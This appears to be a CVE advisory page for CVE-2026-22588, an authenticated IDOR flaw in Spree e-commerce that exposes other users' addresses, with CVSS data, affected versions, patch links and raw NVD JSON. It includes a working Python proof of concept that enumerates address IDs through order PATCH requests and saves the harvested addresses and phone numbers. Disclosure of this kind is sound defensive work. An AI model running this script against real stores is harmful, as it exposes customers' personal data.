Security Vulnerability Report
中文
CVE-2026-22588 CVSS 6.5 MEDIUM

CVE-2026-22588

Published: 2026-01-08 21:15:45
Last Modified: 2026-02-02 16:14:34
Source: [email protected]

Description

Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users’ address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker’s order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* - VULNERABLE
Spree < 4.10.2
Spree < 5.0.7
Spree < 5.1.9
Spree < 5.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22588 IDOR PoC - Spree Address Enumeration # This PoC demonstrates how an authenticated user can access other users' addresses import requests import json TARGET_URL = "https://vulnerable-spree-site.com" ATTACKER_TOKEN = "attacker_auth_token_here" def get_order_id(session): """Get the attacker's first order ID""" headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json"} response = session.get(f"{TARGET_URL}/api/v2/storefront/orders", headers=headers) orders = response.json().get('data', []) if orders: return orders[0]['id'] return None def enumerate_addresses(session, order_id, start_id=1, end_id=1000): """Enumerate other users' addresses by manipulating address_id parameter""" headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json"} exposed_addresses = [] for addr_id in range(start_id, end_id + 1): # Attempt to associate other user's address with attacker's order payload = { "order": { "bill_address_id": addr_id, "ship_address_id": addr_id } } response = session.patch( f"{TARGET_URL}/api/v2/storefront/orders/{order_id}", headers=headers, json=payload ) if response.status_code == 200: order_data = response.json() # Check if address was successfully associated (IDOR successful) if 'included' in order_data and order_data['included']: addr_data = order_data['included'][0] if 'attributes' in addr_data: attrs = addr_data['attributes'] exposed_addresses.append({ "address_id": addr_id, "address1": attrs.get('address1'), "city": attrs.get('city'), "zipcode": attrs.get('zipcode'), "phone": attrs.get('phone') }) print(f"[+] Exposed Address ID {addr_id}: {attrs}") return exposed_addresses def main(): session = requests.Session() # Step 1: Get attacker's order ID order_id = get_order_id(session) if not order_id: print("[-] Failed to obtain order ID") return print(f"[+] Obtained Order ID: {order_id}") # Step 2: Enumerate addresses (adjust range as needed) print("[*] Starting address enumeration...") addresses = enumerate_addresses(session, order_id, 1, 100) print(f"\n[+] Total exposed addresses: {len(addresses)}") # Step 3: Save results with open('exposed_addresses.json', 'w') as f: json.dump(addresses, f, indent=2) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22588", "sourceIdentifier": "[email protected]", "published": "2026-01-08T21:15:44.560", "lastModified": "2026-02-02T16:14:33.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users’ address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker’s order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5."}, {"lang": "es", "value": "Spree es una solución de comercio electrónico de código abierto construida con Ruby on Rails. Antes de las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5, se identificó una vulnerabilidad de Referencia Directa Insegura a Objeto Autenticada (IDOR) que permite a un usuario autenticado recuperar la información de dirección de otros usuarios modificando un pedido existente. Al editar un pedido que poseen legítimamente y manipular los identificadores de dirección en la solicitud, el servidor de backend acepta y procesa referencias a direcciones que pertenecen a otros usuarios, asociando posteriormente esas direcciones con el pedido del atacante y devolviéndolas en la respuesta. Este problema ha sido parcheado en las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "B265915C-3AA8-4B6C-9794-DA08F6359D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "C6C152A8-FCA5-4420-A138-E09B27970EE4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1.0", "versionEndExcluding": "5.1.9", "matchCriteriaId": "54EEC933-938E-404B-A87B-3771931D5E23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.5", "matchCriteriaId": "1C6D055D-A9A8-46E1-A16C-FE17B66E800B"}]}]}], "references": [{"url": "https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.